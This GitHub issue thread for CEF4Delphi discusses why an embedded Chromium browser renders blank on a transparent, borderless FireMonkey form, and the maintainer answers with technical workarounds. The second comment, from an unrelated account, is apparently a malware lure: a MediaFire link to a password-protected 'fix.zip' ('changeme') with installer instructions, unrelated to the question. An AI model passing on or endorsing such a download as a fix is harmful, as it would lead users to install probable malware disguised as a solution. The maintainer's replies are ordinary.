### ISSUE TITLE
FMX，A transparent Form cannot display the browser; it appears blank.

### ISSUE THREAD

**Issue by chenzhifeng0025** [salvadordf/CEF4Delphi#528]
In the FMXTabbedBrowser project of CEF4Delphi, I set the title bar of the MainForm to None and set the Form's transparency to True. I placed a Panel on the Form to serve as the main container, but the browser displays as a blank page. The browser only works correctly when the Form's transparency is set to False. I want to create a borderless Form with shadow effects, which is why I set the transparency to True. How can I resolve this issue?

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by salvadordf** [comment]
FMXTabbedBrowser uses a TFMXWindowParent as a parent control for the web browser.
Chromium requires a valid Windows handle to draw the web contents so TFMXWindowParent inherits from TCommonCustomForm.

Instead of using the Transparent property I would use the workarounds described [here](https://stackoverflow.com/questions/20699032/alphablend-in-firemonkey) on the main form and perhaps on the TBrowserFrame.CreateFMXWindowParent procedure too because FMXWindowParent is a reparented form.

Try using the FMXSkiaBrowser or the FMXExternalPumpBrowser demos.

**Comment by chenzhifeng0025** [comment]
I’m not sure how the page you provided will help with my issue. Your FMXWindowParent is a reparented form—how does this affect the transparency of the MainForm? Why does the FMXWindowParent also become transparent when the MainForm is set to transparent? And why does setting FMXWindowParent to opaque not work? I'm working on a modern, stylish, frameless, and visually appealing application, and I don't like the old-fashioned title bar. Are there any other methods to solve this problem?

**Comment by salvadordf** [comment]
The best solution would be to design your own FMX style : 
https://docwiki.embarcadero.com/RADStudio/Sydney/en/FireMonkey_Style_Designer

Using transparency or setting the Form's Caption to an empty string, disabling all of the BorderIcons, and setting the BorderStyle to bsNone is not the right way to get what you require.
